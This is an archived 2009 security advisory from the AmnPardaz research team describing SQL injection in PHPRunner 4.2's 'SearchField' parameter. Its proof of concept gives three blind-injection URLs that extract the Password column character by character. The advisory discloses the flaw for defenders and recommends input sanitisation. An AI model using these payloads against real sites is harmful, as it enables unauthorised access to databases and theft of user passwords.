Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src / Print Next >>

Date: Tue, 17 Mar 2009 14:05:37 +0330
From: [email protected]
To: [email protected]
Subject: PHPRunner SQL Injection
MIME-Version: 1.0
Content-Type: text/plain;
        charset=ISO-8859-1;
        DelSp="Yes";
        format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
X-Virus-Scanned: antivirus-gw at tyumen.ru

##########################www.BugReport.ir##################################=
######
#
#        AmnPardaz Security Research Team
#
# Title:=09=09PHPRunner SQL Injection
# Vendor:=09=09http://www.xlinesoft.com
# Vulnerable Version:=094.2 (prior versions also may be affected)
# Exploitation:=09=09Remote with browser
# Original Advisory:=09http://www.bugreport.ir/index_63.htm
# Fix:=09=09=09N/A
############################################################################=
#######

####################
- Description:
####################

PHPRunner builds visually appealing web interface for popular =20
databases. Your web site visitors will be able to easily search, add, =20
edit, delete and exprt

data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases.

####################
- Vulnerability:
####################

Input passed to the "SearchField" parameters in "UserView_list.php" is =20
not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary =20
SQL code.

Vulnerable Pages: 'orders_list.php' , 'users_list.php' , =20
'Administrator_list.php'


####################
- PoC:
####################

Its possible to obtain plain text passwords from database by blind =20
fishing exploit

http://example.com/output/UserView_list.php?a=3Dsearch&value=3D1&SearchFor=
=3Dabc&SearchOption=3DContains&SearchField=3DPassword like =20
'%%')--
http://example.com/output/UserView_list.php?a=3Dsearch&value=3D1&SearchFor=
=3Dabc&SearchOption=3DContains&SearchField=3Dmid(Password,1,1)=3D'a')--
http://example.com/output/UserView_list.php?a=3Dsearch&value=3D1&SearchFor=
=3Dabc&SearchOption=3DContains&SearchField=3Dmid(Password,1,2)=3D'ab')--

####################
- Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.


####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

<< Previous INDEX Search src / Print Next >>

Партнёры:

Хостинг: